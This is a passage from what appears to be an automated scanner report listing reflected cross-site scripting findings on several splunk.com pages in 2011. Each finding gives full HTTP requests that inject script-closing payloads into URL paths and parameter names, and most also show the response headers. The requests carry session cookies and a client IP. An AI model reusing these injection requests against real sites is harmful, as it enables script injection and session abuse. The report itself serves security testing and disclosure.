__kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 66f8767cdc34440646d89547f362c1001297008219 Last-Modified: Sun, 06 Feb 2011 16:03:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 336b9--><script>alert(1)</script>d6244de34b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages/SP-CAAAFUY336b9--><script>alert(1)</script>d6244de34b3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:03 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 33b75e3e3844ad4e79be0f80356551121297008244 Last-Modified: Sun, 06 Feb 2011 16:04:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.607. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/splunk-at-whitepages/SP-CAAAFUY
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ea734--><script>alert(1)</script>daea00f9957 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages/SP-CAAAFUY?ea734--><script>alert(1)</script>daea00f9957=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: eb0510474468914a4b54ffba6c9acb661297008170 Last-Modified: Sun, 06 Feb 2011 16:02:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload a0b21--><script>alert(1)</script>0988a50efef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewa0b21--><script>alert(1)</script>0988a50efef/support-documents/SP-CAAAAD4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 246c2--><script>alert(1)</script>6666c625d55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents246c2--><script>alert(1)</script>6666c625d55/SP-CAAAAD4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:57 GMT; path=/ ETag: b3a59d8e5ec2a1bfc5e2107fdc3f7f8d1296944337 Last-Modified: Sat, 05 Feb 2011 22:18:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload fce0c--><script>alert(1)</script>d89b6dd1fe7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents/SP-CAAAAD4fce0c--><script>alert(1)</script>d89b6dd1fe7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.611. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support-documents/SP-CAAAAD4
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35822--><script>alert(1)</script>8e155c440b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents/SP-CAAAAD4?35822--><script>alert(1)</script>8e155c440b5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21552
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 1e04b--><script>alert(1)</script>9352c4b4007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view1e04b--><script>alert(1)</script>9352c4b4007/support-programs/SP-CAAACC8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 725b2--><script>alert(1)</script>5959191eed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs725b2--><script>alert(1)</script>5959191eed4/SP-CAAACC8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 67e7c--><script>alert(1)</script>102368518a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs/SP-CAAACC867e7c--><script>alert(1)</script>102368518a3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.615. http://www.splunk.com/view/support-programs/SP-CAAACC8 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support-programs/SP-CAAACC8
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2dd1--><script>alert(1)</script>4151639d24c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs/SP-CAAACC8?c2dd1--><script>alert(1)</script>4151639d24c=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3d093--><script>alert(1)</script>310d4d8b3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view3d093--><script>alert(1)</script>310d4d8b3fe/support/SP-CAAAAFV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 57e31--><script>alert(1)</script>a47570b3a69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support57e31--><script>alert(1)</script>a47570b3a69/SP-CAAAAFV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
